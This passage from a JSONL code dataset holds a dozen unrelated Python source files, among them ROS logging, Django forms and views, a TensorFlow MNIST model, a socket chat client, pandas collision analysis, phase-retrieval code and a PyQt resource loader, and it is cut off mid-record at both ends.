rospy.logdebug(\n \"Person detected. 
\"\n \"Logging to people_perception collection.\"\n )\n insert = Logging()\n insert.header = pl.header\n insert.uuids = pl.uuids\n insert.people = pl.poses\n insert.robot = self.robot_pose\n insert.people_tracker = pl\n insert.mdl_people_tracker = pt.people\n insert.upper_body_detections = up\n insert.target_frame = self.transform(\n pt.header.frame_id,\n pl.header.frame_id,\n pt.header.stamp\n )\n if pl.header.frame_id == '/base_link':\n insert.base_link = insert.target_frame\n else:\n insert.base_link = self.transform(\n pt.header.frame_id,\n '/base_link',\n pt.header.stamp\n )\n self.msg_store.insert(insert, meta)\n\n def pose_callback(self, pose):\n self.robot_pose = pose\n\nif __name__ == '__main__':\n rospy.init_node('save_people_locations')\n sl = SaveLocations()\n rospy.spin()\n","sub_path":"bayes_people_tracker_logging/scripts/save_locations.py","file_name":"save_locations.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243003672","text":"import requests\n\nfrom utils.ml_api_request import MlApiRequest\n\n\nclass MlApiStyleRequest(MlApiRequest):\n def __init__(self):\n super().__init__(resource='style')\n\n def post(self, description):\n r = requests.post(\n self.url,\n headers=self.headers,\n json={'description': description}\n )\n return r.json()\n\n def put(self, instance_id, description):\n r = requests.put(\n f'{self.url}/{instance_id}',\n headers=self.headers,\n json={'description': description}\n )\n print(r.json())\n return r.json()\n","sub_path":"client_api/style/ml_api.py","file_name":"ml_api.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"410655689","text":"import logging\n\nfrom django import forms\nfrom django.apps import apps\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom .utils import error_utils\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass SchemaUploadForm(forms.Form):\n \"\"\"\n A form for uploading a data schema json file.\n \"\"\"\n\n schema = forms.FileField()\n\n\nclass TypedChoiceField2(forms.TypedChoiceField):\n\n def to_python(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError(\n message='Must choose something',\n code='invalid'\n )\n else:\n return None\n else:\n return super().to_python(value)\n\n\nclass ChoiceField2(forms.ChoiceField):\n\n def to_python(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError(\n message='Must choose something',\n code='invalid'\n )\n else:\n return None\n else:\n return super().to_python(value)\n\n\nclass InterfaceForm(forms.Form):\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n https://code.djangoproject.com/wiki/CookBookNewFormsDynamicFields\n \"\"\"\n\n # Try to get the Interface model\n try:\n Interface = apps.get_model('tdsl', 'Interface')\n except LookupError as e:\n m = 'Interface model not found!'\n logger.exception(m)\n error_utils.reraise(e, m)\n\n # Pop the extra kwargs\n interface_id = kwargs.pop('interface_id', None)\n\n # Try to get the right element instance\n try:\n interface = Interface.objects.get(pk=interface_id)\n except ObjectDoesNotExist as e:\n m = 'Interface instance (pk: {interface_id}) not found!'.format(\n interface_id=interface_id,\n )\n logger.exception(m)\n error_utils.reraise(e, m)\n\n # Call super after popping the extra kwargs\n super(InterfaceForm, self).__init__(*args, **kwargs)\n\n # Disable the use of 
\"required\" key word in html tag\n # to prevent the browser from trying to enforce required fields\n # https://docs.djangoproject.com/en/2.1/ref/forms/api/#django.forms.Form.use_required_attribute\n self.use_required_attribute = False\n\n # Add field for each variable individually\n for i, variable in enumerate(interface.get_input_variables()):\n\n field_name = str(variable.name)\n\n choices = variable.get_choices_tuple()\n\n # For a variable with choices, use (Typed)ChoiceField\n if choices:\n\n # Add an emtpy choice into the choices\n choices = choices + ((None, '. . .'),)\n\n coerce, empty_value = variable.get_coerce_and_empty_value()\n\n if coerce:\n # self.fields[field_name] = forms.TypedChoiceField(\n self.fields[field_name] = TypedChoiceField2(\n label=variable.label,\n choices=choices,\n # widget=variable.get_widget(),\n coerce=coerce,\n empty_value=empty_value,\n required=variable.no_empty_values,\n )\n else:\n # self.fields[field_name] = forms.ChoiceField(\n self.fields[field_name] = ChoiceField2(\n label=variable.label,\n choices=choices,\n # widget=variable.get_widget(),\n required=variable.no_empty_values,\n )\n\n # Without choices, get the appropriate field from the variable\n else:\n field = variable.get_data_value_form_field()\n field.label = variable.label\n field.required = variable.no_empty_values\n # field.widget = variable.get_widget()()\n self.fields[field_name] = field\n\n # Add some extra arguments\n prelabel = None\n postlabel = None\n\n # Set the prelabel if given\n if hasattr(variable, 'prelabel') and variable.prelabel:\n prelabel = variable.prelabel\n\n # Set the postlabel if given\n if hasattr(variable, 'postlabel') and variable.postlabel:\n postlabel = variable.postlabel\n\n # Use units or currency as postlabel if neither prelabel nor postlabel\n if not prelabel and not postlabel:\n if hasattr(variable, 'si_unit') and variable.si_unit:\n if hasattr(variable, 'si_prefix') and variable.si_prefix:\n postlabel = variable.si_prefix + variable.si_unit\n else:\n postlabel = variable.si_unit\n elif hasattr(variable, 'currency') and variable.currency:\n postlabel = variable.currency\n elif hasattr(variable, 'unit') and variable.unit:\n postlabel = variable.unit\n\n self.fields[field_name].prelabel = prelabel\n self.fields[field_name].postlabel = postlabel\n","sub_path":"tdsl/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604679173","text":"'''\nSimple MLP neural network to classify MNIST dataset using ADAM optimiser\n'''\nimport time\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nINPUT_DIMENSIONS = [28, 28, 1]\n# Hyper param\nBATCH_SIZE = 200\nLEARNING_RATE = 1e-4\nEPOCHS = 100\n# Display log messages after every LOG_FREQUENCY iterations during training\nLOG_FREQUENCY = 1\n\n\ndef inference(tp_input, reuse=False):\n \"\"\"\n Construct the neural network structure\n\n :tp_input: Input placeholder\n :return: output logits' expression\n \"\"\"\n with tf.variable_scope('mnist_conv', reuse=reuse):\n te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.relu, reuse=reuse, scope='layer1')\n te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')\n return te_net\n\n\ndef loss(te_inference, tp_labels):\n \"\"\"\n Construct loss expression\n\n :te_inference: expression for logits\n :tp_labels: placeholder for true labels\n 
:return: loss expression \n \"\"\"\n return tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))\n\n\ndef train(te_loss):\n \"\"\"\n Contruct training expression\n\n :te_loss: loss expression\n :return: training expression\n \"\"\"\n tv_global_step = tf.Variable(0, name='global_step_d', trainable=False)\n return slim.learning.create_train_op(te_loss, tf.train.AdamOptimizer(learning_rate=LEARNING_RATE), global_step=tv_global_step)\n\n\ndef accuracy(te_inference, tp_labels):\n \"\"\"\n Construct accuracy expression\n\n :te_inference: expression for logits\n :tp_labels: true label placeholder\n :return: accuracy expression\n \"\"\"\n te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))\n return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))\n\n\ndef placeholders():\n \"\"\"\n Creates placeholders for inputs and labels\n \"\"\" \n tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0]*INPUT_DIMENSIONS[1]])\n tp_label = tf.placeholder(tf.float32, shape=[None, 10])\n return tp_input, tp_label\n\n\ndef run_training(nepochs):\n \"\"\"\n Train the network for given number of epochs\n \n :nepochs: number of epochs to traing for\n :return: nothing\n \"\"\"\n dataset = input_data.read_data_sets('MNIST_data', one_hot=True)\n with tf.Graph().as_default():\n # Create placeholder\n tp_input, tp_labels = placeholders()\n\n # Create network\n te_inference = inference(tp_input)\n te_loss = loss(te_inference, tp_labels)\n\n # Create train ops\n te_train = train(te_loss)\n te_accuracy = accuracy(te_inference, tp_labels)\n\n # Create session\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n\n # Summaries\n tf.contrib.layers.summarize_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n tf.summary.scalar('loss', te_loss)\n merged = tf.summary.merge_all()\n summary_writer = tf.summary.FileWriter('./summaries_bp', sess.graph)\n saver = tf.train.Saver()\n\n duration = 0\n print('%-10s | %-20s | %-20s | %-10s' % ('Epoch', 'Loss', 'Accuracy', 'Time(s)'))\n print('-' * 86)\n\n for i in range(nepochs):\n for _ in range(int(dataset.train.images.shape[0]/BATCH_SIZE)):\n batch = dataset.train.next_batch(BATCH_SIZE)\n start_time = time.time()\n # Run the training operation and get the loss\n summary, _, val_loss = sess.run([merged, te_train, te_loss], feed_dict={tp_input: batch[0], tp_labels: batch[1],})\n duration += (time.time() - start_time)\n summary_writer.add_summary(summary, i)\n # Logging\n if i % LOG_FREQUENCY == 0:\n batch = dataset.train.next_batch(BATCH_SIZE)\n print('%-10s | %-20s | %-20s | %-10s' % ('%d' % i, '%.5f' % val_loss, '%.5f' % sess.run(te_accuracy, {tp_input: batch[0], tp_labels: batch[1]}), '%.2f' % duration))\n duration = 0\n saver.save(sess, \"./saved_models/mnist_bp.ckpt\")\n\n # Evaluate Final Test Accuracy\n mnist_test_images = dataset.test.images\n mnist_test_labels = dataset.test.labels\n overall_acc = 0.0\n for i in range(0, len(mnist_test_images), BATCH_SIZE):\n overall_acc += sess.run(te_accuracy, {tp_input: mnist_test_images[i:i + BATCH_SIZE], tp_labels: mnist_test_labels[i:i + BATCH_SIZE]})\n print('Final test accuracy: %g' % (overall_acc * BATCH_SIZE / len(mnist_test_images)))\n\nif __name__=='__main__':\n run_training(2000)\n\n","sub_path":"mlp_bp.py","file_name":"mlp_bp.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"352423332","text":"import socket 
\nfrom colorama import Fore, init, Back;\nfrom threading import *\nimport random \n\ninit()\n\ncolors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX, \n Fore.LIGHTBLUE_EX, Fore.LIGHTCYAN_EX, Fore.LIGHTGREEN_EX, \n Fore.LIGHTMAGENTA_EX, Fore.LIGHTRED_EX, Fore.LIGHTWHITE_EX, \n Fore.LIGHTYELLOW_EX, Fore.MAGENTA, Fore.RED, Fore.WHITE, Fore.YELLOW\n]\n\nclient_color = random.choice(colors)\n\nclientSocket = socket.socket()\nconnected = False\n\ndef clientListener():\n\twhile True:\n\t\ttry:\n\t\t\tmessage = clientSocket.recv(1024).decode()\n\t\t\tprint(\"\\n\", message)\n\t\texcept socket.error as e:\n\t\t\tclientSocket.close()\n\t\t\tbreak\n\n\nhost = \"localhost\"\nport = 12345\nseprator_token = \"\"\ndisconectMessage = \"!DISCONNECT\"\n\ndef serverConnect():\n\tprint(\"waiting for connection\")\n\ttry:\n\t\tclientSocket.connect((host, port))\n\texcept socket.error as e:\n\t\tprint(str(e))\n\tt = Thread(target=clientListener, args=())\n\tt.daemon = True\n\tt.start()\n\tname = input(\"Enter your name\")\n\tclientSocket.send(name.encode())\n\tprint(\"To quit type q\\ntype receiver username before typing message-username_\\nfor multiple users use username1_username2_...\\nFor sending to all users, type all_\")\n\twhile True:\n\t\tdata = input()\n\t\tif data.lower() == \"q\":\n\t\t\tbreak\n\n\t\tdatasend = f\"{client_color} {name}{seprator_token}{data}{Fore.RESET}\"\n\n\t\tclientSocket.send(datasend.encode())\n\n\tclientSocket.send(disconectMessage.encode())\n\tclientSocket.close()\n\n\n\nwhile True:\n\tprint(\"To connect to the server press c and q to quit the program\")\n\n\ta = input()\n\n\tif a.lower() == \"c\":\n\t\tconnected = True\n\t\tserverConnect()\n\telse:\n\t\tif a.lower() == \"q\":\n\t\t\tbreak\n\n\n\n\n\n","sub_path":"TCP socket/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86089492","text":"from .controllers import *\n\n\ndef customer_routes(api):\n\n api.add_resource(CustomerHandler, '/v2/customers', endpoint='customers')\n api.add_resource(CustomerUuidHandler, '/v2/customers/', endpoint='customer_by_uuid')\n api.add_resource(CustomerOrderHandler, '/v2/customers//orders', endpoint='customer_orders')\n\n return\n","sub_path":"lesson11/myapp/customer/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"191198576","text":"\n# coding: utf-8\n\n# # Q1_PART ONE\n# NYC VEHICLE COLLISION ANALYSIS\n\n# Use ‘vehicle_collisions’ data set.\n# • For each month in 2016, find out the percentage of collisions in\n# Manhattan out of that year's total accidents in New York City.\n# • Display a few rows of the output use df.head().\n# • Generate a csv output with four columns (‘Month’, ‘Manhattan’, ‘NYC’, ‘Percentage’)\n\n# In[2]:\n\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom datetime import datetime,date\n\n\n# In[3]:\n\npath_local='Data/vehicle_collisions.csv'\ndata_raw = pd.read_csv(path_local)\n\n\n# ### Process raw data: only keep date and borough columns\n\n# In[8]:\n\ndf1=data_raw.loc[:,['DATE','BOROUGH']]\n\n\n# ### Extract year and month from date column and put year and month in new columns\n\n# In[10]:\n\ndf1.loc[df1.index,'YEAR']=df1.loc[df1.index,'DATE'].apply(lambda x: datetime.strptime(x,'%m/%d/%y').date().strftime('%y'))\ndf1['MONTH']=df1['DATE'].apply(lambda x: 
datetime.strptime(x,'%m/%d/%y').date().strftime('%b'))\n\n\n# ### Only keep data in year 2016\n\n# In[11]:\n\ndf1=df1[df1['YEAR']=='16']\n\n\n# ### Get accident information only for Manhattan\n\n# In[13]:\n\ndf0=df1.loc[df1['BOROUGH'] == 'MANHATTAN']\n\n\n# ### Group accident happended in NYC and Manhattan by month\n\n# In[29]:\n\ngroup = df1.groupby(df1['MONTH'])['BOROUGH']\ngroup1 = df0.groupby(df0['MONTH'])['BOROUGH']\n\n\n# ### Count the total accidents in NYC and Manhattan and create data frame for the two boroughs\n\n# In[37]:\n\nseries=group.size()\nseries1=group1.size()\n\n\n# In[38]:\n\ndel series1.index.name\ndf2=DataFrame(series1,columns=['MANHATTAN'])\ndf2.columns.name='MONTH'\n\n\n# In[39]:\n\ndel series.index.name\ndf3=DataFrame(series,columns=['NYC'])\ndf3.columns.name='MONTH'\n\n\n# ### Concate data frames of NYC and Manhattan, reindexing and caculate percentage\n\n# In[40]:\n\nresult=pd.concat([df2,df3],axis=1)\n\n\n# In[41]:\n\nframe=result.reindex(index=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'])\n\n\n# In[42]:\n\nframe['PERCENTAGE']=frame['MANHATTAN']/frame['NYC']\n\n\n# ### A little sample\n\n# In[43]:\n\nframe\n\n\n# ### Put result in csv file\n\n# In[407]:\n\nframe.to_csv('Q1_p1.csv', index_label='MONTH')\n\n\n# In[ ]:\n\n\n\n","sub_path":"Assignment3/Q1_PART_ONE.py","file_name":"Q1_PART_ONE.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593687745","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Board\nfrom user.models import CustomUser\n\ndef board_read(request):\n boards = Board.objects.all()\n context = {'boards': boards} \n return render(request, 'board/read.html', context)\n\ndef board_read_one(request, pk):\n board = get_object_or_404(Board, pk=pk)\n context = {'board': board}\n return render(request, 'board/read_one.html', context) #권혁상\n\ndef board_create(request):\n if request.method == 'POST' and request.session.get('user', False):\n title = request.POST['title']\n author = get_object_or_404(CustomUser, username=request.session['user'])\n content = request.POST['content']\n \n board = Board(\n author = author,\n title = title,\n content = content)\n board.save()\n\n return redirect('board_read')\n else:\n return render(request, 'board/create.html')\n\ndef board_update(request, pk):\n if request.method == 'POST':\n title = request.POST['title'] \n content = request.POST['content']\n board = Board.objects.get(pk=pk)\n board.title = title\n board.content = content\n board.save()\n return redirect('home') #수정 \n\n else:\n board = get_object_or_404(Board, pk=pk)\n context = {\"board\" : board}\n return render(request, 'board/update.html', context)\n\ndef board_delete(request, pk):\n board = Board.objects.get(pk=pk)\n board.delete()\n return redirect('board_read')","sub_path":"cafe_project/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"7673159","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 15 13:46:27 2021.\n\n@author: quenot\n\"\"\"\nimport numpy as np\nimport frankoChellappa as fc\nfrom scipy.ndimage.filters import gaussian_filter, median_filter\nfrom matplotlib import pyplot as plt\nfrom skimage import color, data, restoration\nfrom phaseIntegration import kottler, LarkinAnissonSheppard\n\n\ndef 
LCS(experiment):\n \"\"\"Calculates the displacement images from sample and reference images using the LCS system\n \n\n Args:\n experiment (PhaseRetrievalClass): class with all parameters as attributes.\n\n Returns:\n Dx (NUMPY ARRAY): the displacements along x axis.\n Dy (NUMPY ARRAY): the displacements along y axis.\n absoprtion (NUMPY ARRAY): the absorption.\n\n \"\"\"\n\n Nz, Nx, Ny=experiment.reference_images.shape\n LHS=np.ones(((experiment.nb_of_point, Nx, Ny)))\n RHS=np.ones((((experiment.nb_of_point,3, Nx, Ny))))\n solution=np.ones(((3, Nx, Ny)))\n\n #Prepare system matrices\n for i in range(experiment.nb_of_point):\n #Right handSide\n gX_IrIr,gY_IrIr=np.gradient(experiment.reference_images[i])\n RHS[i]=[experiment.sample_images[i],gX_IrIr, gY_IrIr]\n LHS[i]=experiment.reference_images[i]\n\n #Solving system for each pixel \n for i in range(Nx):\n for j in range(Ny):\n a=RHS[:,:,i,j]\n b=LHS[:,i,j]\n Q,R = np.linalg.qr(a) # qr decomposition of A\n Qb = np.dot(Q.T,b) # computing Q^T*b (project b onto the range of A)\n \n if R[2,2]==0 or R[1,1]==0 or R[0,0]==0:\n temp=[1,0,0]\n else:\n temp = np.linalg.solve(R,Qb) # solving R*x = Q^T*b\n solution[:,i,j]=temp\n \n absoprtion=1/solution[0]\n Dx=solution[1]\n Dy=solution[2]\n \n #Bit of post-processing\n #Limiting displacement to a threshold\n displacementLimit=experiment.max_shift\n Dx[Dx<-displacementLimit]=-displacementLimit\n Dx[Dx>displacementLimit]=displacementLimit\n Dy[Dy<-displacementLimit]=-displacementLimit\n Dy[Dy>displacementLimit]=displacementLimit\n #Trying different filters\n if experiment.LCS_median_filter !=0:\n Dx=median_filter(Dx,size=experiment.LCS_median_filter)\n Dy=median_filter(Dy,size=experiment.LCS_median_filter)\n \n return Dx, Dy, absoprtion\n\n\ndef processProjectionLCS(experiment):\n \"\"\"launches calculation of displacement maps and phase images from LCS, FC, LA and K.\n \n Args:\n experiment (PHASERETRIEVALCLASS): class of the experiment.\n\n Returns:\n dict | NUMPY ARRAY : contains all the calculated images.\n\n \"\"\"\n experiment.nb_of_point, Nx, Ny= experiment.sample_images.shape\n \n dx, dy , absorption =LCS(experiment)\n\n # Compute the phase gradient from displacements (linear relationship)\n # magnification=(experiment['distSO']+experiment['distOD'])/experiment['distSO'] #Not sure I need to use this yet\n \n print(\"experiment pixel\", experiment.pixel)\n print(\"distance object detector\", experiment.dist_object_detector)\n print(\"k\", experiment.getk())\n \n \n dphix=dx*(experiment.pixel/experiment.dist_object_detector)*experiment.getk()\n dphiy=dy*(experiment.pixel/experiment.dist_object_detector)*experiment.getk()\n \n padForIntegration=True\n padSize=1000\n if padForIntegration:\n dphix = np.pad(dphix, ((padSize, padSize), (padSize, padSize)),mode='reflect') # voir is edge mieux que reflect\n dphiy = np.pad(dphiy, ((padSize, padSize), (padSize, padSize)),mode='reflect') # voir is edge mieux que reflect\n \n # Compute the phase from phase gradients with 3 different methods (still trying to choose the best one)\n phiFC = fc.frankotchellappa(dphiy, dphix, True)*experiment.pixel\n phiK = kottler(dphiy, dphix)*experiment.pixel\n phiLA = LarkinAnissonSheppard(dphiy, dphix)*experiment.pixel\n \n if padSize > 0:\n phiFC = phiFC[padSize:padSize + Nx, padSize:padSize + Ny]\n phiK = phiK[padSize:padSize + Nx , padSize:padSize + Ny]\n phiLA = phiLA[padSize:padSize + Nx, padSize:padSize + Ny]\n\n return {'dx': dx, 'dy': dy, 'phiFC': phiFC.real, 'phiK': phiK.real,'phiLA': phiLA.real, 
'absorption':absorption}\n \n \n\n","sub_path":"popcorn/phase_retrieval/LCS.py","file_name":"LCS.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"343990682","text":"# -*- coding: utf-8 -*-\n# __author__ = 'XingHuan'\n# 4/4/2018\n\n# Copyright 2018 XingHuan\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport sys\nfrom sins.module.sqt import *\nfrom sins.utils.const import declare_constants\nfrom sins.utils.cache import sins_cached\nfrom sins.utils.log import get_logger\n\n\nuseRes = False\ntry:\n import respy1\n useRes = True\nexcept ImportError:\n pass\n\n\nlogger = get_logger(__name__)\n\nRes_Folder = '/'.join(__file__.replace('\\\\', '/').split('/')[:-3]) + '/resource'\n\nicon = declare_constants(\n Shot=\"icon/Shot.png\",\n Shot_B=\"icon/Shot_bright.png\",\n Sequence=\"icon/Sequence.png\",\n Sequence_B=\"icon/Sequence_bright.png\",\n Media=\"icon/Media.png\",\n Task=\"icon/Task.png\",\n Task_B=\"icon/Task.png\",\n Asset=\"icon/Asset.png\",\n Asset_B=\"icon/Asset_bright.png\",\n File=\"icon/File.png\",\n # File_B=\"icon/File_bright.png\",\n Tag=\"icon/Tag.png\",\n Department=\"icon/Department.png\",\n Department_B=\"icon/Department_bright.png\",\n PermissionGroup=\"icon/PermissionGroup.png\",\n PermissionGroup_B=\"icon/PermissionGroup_bright.png\",\n Status=\"icon/Status.png\",\n ApiUser=\"icon/ApiUser.png\",\n Person=\"icon/Person.png\",\n Person_B=\"icon/Person_bright.png\",\n Group=\"icon/Group.png\",\n Group_B=\"icon/Group_bright.png\",\n PipelineStep=\"icon/PipelineStep.png\",\n PipelineStep_B=\"icon/PipelineStep_bright.png\",\n Project=\"icon/Project.png\",\n Note=\"icon/Note.png\",\n AssetType=\"icon/AssetType.png\",\n AssetType_B=\"icon/AssetType_bright.png\",\n Timelog=\"icon/Timelog.png\",\n Playlist=\"icon/Playlist.png\",\n Playlist_B=\"icon/Playlist.png\",\n Version=\"icon/Version.png\",\n Movie=\"icon/file_video_gray.png\",\n Frame=\"icon/file_sequence_gray.png\",\n)\n\n\nerror_pic = declare_constants(\n Error01=os.path.join(Res_Folder, 'other', 'Error01.png'),\n Error02=os.path.join(Res_Folder, 'other', 'Error02.png'),\n)\n\n\ndef get_pic(*args):\n if useRes:\n return \":res/\" + \"/\".join(list(args))\n else:\n return os.path.join(Res_Folder, *args).replace('\\\\', '/')\n\n\ndef get_qicon(*args):\n return QIcon(get_pic(*args))\n\n\n# def get_pixmap(*args, **kwargs):\n# \"\"\"\n# return QPixmap object based on name and scale\n# :param name: pic name\n# :param scale: scale factor, list or int\n# :return: QPixmap\n# \"\"\"\n# if \"scale\" not in kwargs:\n# if os.path.exists(args[0]):\n# return QPixmap(args[0])\n# return QPixmap(get_pic(*args))\n# else:\n# scale = kwargs[\"scale\"]\n# if isinstance(scale, list):\n# if os.path.exists(args[0]):\n# return QPixmap(args[0]).scaled(scale[0], scale[1], Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# return QPixmap(get_pic(*args)).scaled(scale[0], scale[1], Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# else:\n# if 
os.path.exists(args[0]):\n# return QPixmap(args[0]).scaled(scale, scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# return QPixmap(get_pic(*args)).scaled(scale, scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n\n\ndef get_pixmap(*args, **kwargs):\n \"\"\"\n return QPixmap object based on name and scale\n :param name: pic name\n :param scale: scale factor, list or int\n :return: QPixmap\n \"\"\"\n path = args[0] if os.path.isfile(args[0]) else get_pic(*args)\n scale = kwargs.get('scale')\n aspect = kwargs.get('aspect', 'keep')\n color = kwargs.get('color')\n error = kwargs.get('error', 'Error01')\n clip = kwargs.get('clip')\n\n if isinstance(scale, QSize):\n pass\n elif isinstance(scale, (list, tuple)):\n scale = QSize(scale[0], scale[1])\n elif isinstance(scale, int):\n scale = QSize(scale, scale)\n\n if isinstance(color, QColor):\n pass\n elif color == \"auto\":\n color = QApplication.instance().palette().text().color()\n elif isinstance(color, basestring):\n color = QColor(color)\n elif isinstance(color, int):\n color = QColor(color)\n elif isinstance(color, list):\n color = QColor(color[0], color[1], color[2])\n elif isinstance(color, QWidget):\n widget = color\n is_enabled = widget.isEnabled()\n if not is_enabled:\n widget.setEnabled(True)\n color = widget.palette().text().color()\n if not is_enabled:\n widget.setEnabled(is_enabled)\n\n if path.endswith(\"svg\"):\n svg = QtSvg.QSvgRenderer(path)\n if not scale:\n scale = svg.defaultSize()\n\n img = QImage(scale, QImage.Format_ARGB32)\n painter = QPainter()\n painter.begin(img)\n\n if not color:\n color = QApplication.palette().text().color()\n\n if color:\n painter.setCompositionMode(QPainter.CompositionMode_Plus)\n painter.fillRect(img.rect(), color)\n painter.setCompositionMode(QPainter.CompositionMode_SourceOut)\n svg.render(painter)\n if color:\n painter.fillRect(img.rect(), color)\n painter.end()\n pixmap = QPixmap.fromImage(img)\n\n else:\n img = QImage(path)\n if img.width() == 0:\n logger.warning('error image: \"{}\"'.format(path))\n img = QImage(getattr(error_pic, error))\n if scale:\n if aspect == 'keep':\n img = img.scaled(scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n elif aspect == 'expand':\n img = img.scaled(scale, Qt.KeepAspectRatioByExpanding, Qt.SmoothTransformation)\n elif aspect == 'width':\n img = img.scaledToWidth(scale.width(), Qt.SmoothTransformation)\n elif aspect == 'height':\n img = img.scaledToHeight(scale.height(), Qt.SmoothTransformation)\n if color:\n img = img.convertToFormat(QImage.Format_Indexed8)\n if img.depth() in [1, 8]:\n for index in range(img.colorCount()):\n src_color = QColor.fromRgba(img.color(index))\n img.setColor(index, QColor(color.red(), color.green(), color.blue(),\n src_color.alpha()).rgba())\n else:\n for row in range(img.height()):\n # print img.scanLine(row)\n # print len(img.scanLine(row))\n # help(img.scanLine(row))\n # for pix in img.scanLine(row):\n # print pix\n for col in range(img.width()):\n src_color = QColor.fromRgba(img.pixel(col, row))\n if not src_color.alpha():\n continue\n img.setPixel(col, row, color.rgb())\n\n pixmap = QPixmap.fromImage(img)\n\n if clip and isinstance(clip, (list, tuple)):\n pixmap = pixmap.copy(*clip)\n\n return pixmap\n\n\n@sins_cached()\ndef get_style(name):\n if useRes:\n cssFile = QFile(\":res/style/%s.css\" % name)\n cssFile.open(QFile.ReadOnly)\n css = cssFile.readAll().data()\n cssFile.close()\n css = css.replace(\"%s\", \":res\")\n return css\n else:\n styleFile = os.path.join(Res_Folder, \"style\", \"%s.css\" % name)\n 
styleText = open(styleFile).read()\n styleText = styleText.replace(\"%s\", Res_Folder)\n styleText = styleText.replace(\"\\\\\", \"/\")\n # print styleText\n return styleText\n\n\ndef get_styles(*names):\n style = ''\n for name in names:\n style += get_style(name)\n return style\n\n\ndef get_qmovie(*args):\n return QMovie(get_pic(*args))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n # print get_pic(\"player\", \"aaa.png\")\n # print get_pixmap(\"player\", \"aaa.png\")\n # print get_pixmap('F:/Temp/pycharm/Sins_data/sins/File/0000/0000/0015/DRM.jpg', scale=[100, 70])\n # print get_style(\"main_gui\")\n label = QLabel()\n movie = get_qmovie('gif', 'loading0.gif')\n label.setMovie(movie)\n movie.start()\n label.show()\n app.exec_()\n","sub_path":"sins/utils/res/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"71823654","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom sympy.ntheory.modular import crt\n\nfilename = argv[1]\nwith open(filename) as f:\n start_time = int(f.readline().rstrip())\n ids_raw = f.readline().rstrip().split(',')\n ids = [int(i) for i in ids_raw if i != 'x']\n v = [(int(id_raw)-i) % int(id_raw) for i, id_raw in enumerate(ids_raw) if id_raw != 'x']\n\ni = 0\nfound = False\nwhile not found:\n t = start_time + i\n for x in ids:\n if t % x == 0:\n print('Part 1:', i * x)\n found = True\n break\n i += 1\n\nprint('Part 2:', crt(ids, v)[0])\n","sub_path":"day13/shuttle_search.py","file_name":"shuttle_search.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290424129","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.db.models import Count\n# from django.core.paginator import Paginator\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .serializers import GenreSerializer\nfrom .models import Genre, Movie, Comment\nfrom .serializers import MovieSerializer, MovieListSerializer, GenreListSerializer, 